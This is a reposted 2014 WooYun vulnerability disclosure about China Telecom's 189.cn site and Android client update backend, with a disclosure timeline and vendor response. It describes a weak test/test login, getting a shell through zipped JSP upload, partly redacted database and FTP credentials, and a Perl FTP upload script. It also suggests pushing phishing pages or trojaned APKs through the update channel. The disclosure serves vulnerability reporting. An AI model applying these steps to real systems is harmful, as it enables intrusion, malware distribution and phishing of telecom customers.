首页
社区
课程
招聘
中国电信官网(www.189.cn)钓鱼挂马以及电信营业厅安卓客户端定向\集体推送更新(绑马)等高危漏洞合集
发表于: 2014-10-19 12:34 2332

中国电信官网(www.189.cn)钓鱼挂马以及电信营业厅安卓客户端定向\集体推送更新(绑马)等高危漏洞合集

2014-10-19 12:34
2332
漏洞概要
缺陷编号: WooYun-2014-70509
漏洞标题: 中国电信官网(www.189.cn)钓鱼挂马以及电信营业厅安卓客户端定向\集体推送更新(绑马)等高危漏洞合集  
相关厂商: 中国电信
漏洞作者: s0mun5
提交时间: 2014-07-31 18:23
公开时间: 2014-09-14 18:24
漏洞类型: 系统/服务运维配置不当
危害等级: 高自评Rank: 20
漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.orgTags
--------------------------------------------------------------------------------
漏洞详情披露状态:
2014-07-31: 细节已通知厂商并且等待厂商处理中
2014-08-05: 厂商已经确认,细节仅向厂商公开
2014-08-15: 细节向核心白帽子及相关领域专家公开
2014-08-25: 细节向普通白帽子公开
2014-09-04: 细节向实习白帽子公开
2014-09-14: 细节向公众公开

简要描述:或许哪一天 通过看域名判断是不是钓鱼网站的方法不再有效
或许哪一天 官网推送的更新不再是官方的更新
或许哪一天 ......
详细说明:误打误撞进了一个电信的安卓营业厅发布以及推送后台

http://118.***.**.*:8080/

弱口令 test/test

静态配置页面 发布 部署后 直接可以getshell两个台内网服务器

1.jpg

(jsp打包zip 上传zip 自动解压缩)

http://118.***.**.*:8080/ 以及 http://***.client.189.cn:8006

发布的时候可以选择是否强制推送或者选择定向推送更新

2.jpg

3.jpg

漏洞证明:下面证明该更新确定就是客户端收到的链接

1.jpg

Screenshot_2014-07-31-17-56-06.png

后台中的文字跟推送的文字相同

2.jpg

4.jpg

burp抓到的更新地址与shell地址相同(**ervice与**update 在内网是同一台服务器 并且做了负载均衡)

code 区域#\u6570\u636e\u5e93\u8fde\u63a5\u914d\u7f6e(\u751f\u4ea7\u73af\u5883)
jdbc.driver=oracle.jdbc.driver.OracleDriver
jdbc.url=jdbc:oracle:thin:@172.**.**.*:1521/clidb
jdbc.username=UNI_。。。
jdbc.password=UNI_。。。

code 区域#luckyDraw job product data source(\u751f\u4ea7\u73af\u5883)
jdbc.driverluckydraw=oracle.jdbc.driver.OracleDriver
jdbc.urlluckydraw=jdbc:oracle:thin:@172.**.**.**:1521/clidb
jdbc.usernameluckydraw=e_xxxxx
jdbc.passwordluckydraw=e_xxxxx

配置文件中的数据库连接串

由于库太大读取对业务有影响 没去确定 但是根据客户端登陆的数据包可以推断

code 区域用户验证也是cservice服务器上

code 区域POST /map/clientXML?encrypted=true HTTP/1.1
Content-Length: 976
Content-Type: text/xml
Host: **.client.189.cn:8004
Connection: Keep-Alive
User-Agent: HUAWEI HUAWEI G700-U00/4.2.0

2966AA9F9A149371483724B75DC53D50AD1EBCEB8D1C521B1478D58D6D2F4401A2C1E427857D9B23F95792E555157890669065F66341F4A09147C1DDB4A8AB6C26BA0BDAE094A298AD69D31A8563D934CF9169F0958250868F7E8643CF7EA858BF6860B75B669AE1F2869EB860D4658977A4DE3445C5C5D504F2471072C292BDBAA2A888F4DF7D1AFC44E84C44F788E0DB10D70741534BF4D2C228BCD560F4E3EFB0FDA085F2034BD875F6470FE379680FF8D379292FE5AC4ED255FE1EB4FAC4821C6F81FFB5DC363C13FEBFC5D008110C8B6A0BA95743642E03E009D1F6C21EEF4156F204A5F5ECBF4EE4C26A152DD68163CD484BE3989916D074774E1D10A10A6784B2BD31EF7C40E90E1FD63A5387C987F69F0FBB3F24DE4CB013F501E37E7B3BF34458D75E508FCFD1F4D179C05179F93A718DAE9104C9176472EACF1E448D436D86256AF9970C966231EB3FFA323CDEEB5C144613EE13A4ED2ADA7896CD05667F4CA39EBA9F3C0456757A6BAC5BAE8070A477F4871FA3F100499758A6E5C4CA7F6D0ACBB3392D6283528D5940965425CA093F53F136D8503F5790C8F79738351B6E9A80F3FFB9B9AA7B26A8370751CC95B47A4CEBA7EA111FE56852BDF57595DC9B20BD84ED3B3AF54926DF8DE175CD5AA8F6CD8BB7E41C900F7F839BB823F8106E32AFFF26

(负载均衡服务器大部分目录结构不一样 实在是没时间去翻map/clientXML 映射在哪了)

配置文件中有这么一段

code 区域pictures.filePath=http://diy.189.cn/client/maintopad/test/
ftp_url=172.16.***.*
ftp_port=21
ftp_userName=xxxxx
ftp_passWord=xxxxxx
ftp_list=/maintopad/test/

用perl连接ftp上传html(已经验证不解析任何脚本)

code 区域use Net::FTP;
$ftp = Net::FTP->new("172.16.***.*", Timeout => 30)
        or die "Could not connect.\n";
$username = "xxxxxx";
$password = "xxxxxx";
$ftp->login($username, $password)
        or die "Could not log in.\n";
$remotefile = "test.html";
$localfile = "test.html";
$ftp->put($remotefile, $localfile)
        or die "Can not get file.\n";

http://www.189.cn/client/test.html

这里可以做的多了 谁会觉得官网的二级目录是钓鱼呢 传exe apk 当然也可以

如果结合上面那个后台的推送 把钓鱼页面推送到手机上 是不是可信度更高了: )
  
修复方案:
版权声明:转载请注明来源 s0mun5@乌云
--------------------------------------------------------------------------------
漏洞回应厂商回应:危害等级:高
漏洞Rank:12
确认时间:2014-08-05 09:33
厂商回复:CNVD确认并复现所述情况,已经转由CNCERT直接通报给中国电信集团公司处置。
最新状态:暂无

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//